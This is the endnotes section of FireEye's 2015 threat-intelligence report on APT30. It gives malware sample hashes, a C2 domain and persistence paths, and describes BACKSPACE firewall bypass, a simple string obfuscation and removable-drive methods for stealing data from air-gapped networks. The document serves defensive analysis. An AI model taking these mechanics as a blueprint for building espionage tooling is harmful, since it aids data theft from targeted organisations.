22 The paths %WINDIR%\$NtUninstallKB900727$ and %WINDIR%\$NtUninstallKB885884$ are used by some variants of the
FLASHFLOOD malware, one of three components believed to be used to steal data from air-gapped networks.
23 Two outliers were compiled in May 2011; those samples also used the aseanm.com C2 domain and may have been
created to target the 18th ASEAN Summit.
24 CSIDL (constant special item ID list) values are used to identify frequently used folders that may not have the same
path on different Windows systems. CSIDL_TEMPLATES corresponds to the folder used to store document templates;
for example, C:\Documents and Settings\
bb762494%28v=vs.85%29.aspx for additional detail.
25 The threat actor can provide a target IP address or hostname with the ‘(‘ command.
26 Most “ZJ Listen” samples were compiled on December 31, 2012 and share similar version numbers with the “ZJ Link”
samples from April 2013 (e.g., version strings containing Lan2.2Lnk for “ZJ Listen” and F2.2Lnk or F2.3Lnk for “ZJ Link”).
27 http://www.mfa.gov.bt/wp-content/uploads/2013/08/press-release11
28 Shear, Michael. “White House Urges China to Act on Journalists’ Visas”. Jan 30, 2014. http://www.nytimes.
com/2014/01/31/world/asia/white-house-urges-china-to-act-on-journalists-visas.html
29 BACKSPACE is also known as “Lecna” and may be detected by security vendors by either name – e.g., Backdoor.APT.Lecna.
30 Comparison is generalized; individual samples may vary.
31 The hex representation of each ASCII character is incremented by one. ‘M’ (0x4D) becomes ‘N’ (0x4E), ‘.’ (0x2E)
becomes ‘/’ (0x2F), etc.
32 https://msdn.microsoft.com/en-us/library/windows/desktop/aa365740%28v=vs.85%29.aspx
33 Analysis of other BACKSPACE variants suggests that the firewall bypass features may be a modular capability that can
be compiled into different versions at will. Preliminary analysis suggests that version numbers for some BACKSPACE
variants may include a “Y” or an “N” to indicate the presence or absence of this feature.
34 Version information is the OSVERSIONINFO struct data returned by a call to GetVersionEx.
35 Analysis of other versions of BACKSPACE showed that Port3 may be used for an interactive remote command shell, but
that function was not supported in sample 6ee35da59f92f71e757d4d5b964ecf00.
36 https://msdn.microsoft.com/en-us/library/windows/desktop/aa365740%28v=vs.85%29.aspx
37 Due to limited availability of products localized for languages like Thai, Tagalog, or others used in the Southeast Asia
region, English and Chinese would likely be the most common versions used by organizations in that area.
38 The ‘W’ is overwritten by the malware version string. The version string is 5 bytes including the NULL character. It
appears the beacon was intended to have a 4 byte version string. When copying the 2.18\x00, the last \x00 overwrites the
‘W’ character.
39 Persistence may be provided by other files used to retrieve or install NETEAGLE; for example, the MILKMAID/
ORANGEADE droppers create a shortcut file to establish persistence for a second-stage file downloaded by their
CREAMSICLE payloads.
40 It is possible that this behavior is configured within the binary at compile time, or has been otherwise modified in this version.
41 SHIPSHAPE determines the disk size by TotalNumberOfBytes returned from GetDiskFreeSpace. The return value is
typically the size of the drive or, if quotas are enabled, the value is the size of the quota.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
69
42 Because the copied executables are external to the SHIPSHAPE malware, their content or purpose is unknown. FireEye
believes that SHIPSHAPE may be used to copy tools such as SPACESHIP, which could then be transferred (via the
removable drive) to another victim computer.
43 The sample f18be055fae2490221c926e2ad55ab11, described here, targets folders and / x files, although the sample
b249bcf741e076f11b6c9553f6104f16 contains icons for a much broader range of file types within its resource section.
44 These are believed to be directories used by other pieces of the malware ecosystem. The SPACESHIP sample analyzed
below references both the \msdn\ and \Recycled\ directories on a removable drive; the FLASHFLOOD sample
references \$LDDATA$\ and \Recycled\.
45 Info.txt is used as a log file where information associated with scanning and file information is kept.
46 Likely an updated configuration file. Note the missing \ in the directory path between FoxPro and ld.ini.)
47 The purpose of this activity is unclear. SENS (the System Event Notification Service) can be used to support mobile
computers or computers on high-latency networks. See https://msdn.microsoft.com/en-us/library/windows/desktop/
cc185680%28v=vs.85%29.aspx.
48 See https://msdn.microsoft.com/en-us/library/ms629649%28v=vs.85%29.aspx.
49 See https://msdn.microsoft.com/en-us/library/windows/desktop/ms724284%28v=vs.85%29.aspx.
50 FLASHFLOOD determines the disk size using the TotalNumberOfBytes returned from GetDiskFreeSpace. The return
value is typically the size of the drive or, if quotas are enabled, the value is the size of the quota.
51 Presumably files in these directories were already archived, e.g., when copied to the drive by SPACESHIP.
52 The file “China MFA Press Briefing 29October 2012 ” (md5 hash f054c0f8c5b4c2a5eb30a16ebe09d8d0) is an example
of an exploit document that drops ORANGEADE and the DLL variant of CREAMSICLE.
53
C:\Documents and Settings\[user]\Start Menu\Programs\Startup under Windows XP or
C:\Users\[user]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup under Vista/Windows 7.
54 Netsvc.exe is presumably an updated backdoor, downloaded if the BACKSPACE mutexes are not found on the victim
host.
55 Netsvc.exe is presumably an updated backdoor, downloaded if the BACKSPACE mutex is not found on the victim host.
To download this or other
FireEye Threat Intelligence reports,
visit: www.fireeye.com/reports
© 2015 FireEye, Inc. All rights reserved. FireEye is a registered trademark of
FireEye, Inc. All other brands, products, or service names are or may be trademarks
or service marks of their respective owners. SP.SYR.EN-US.022015
FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | 408.321.6300 | 877.FIREEYE (347.3393) | info@fireeye.com | www.fireeye.com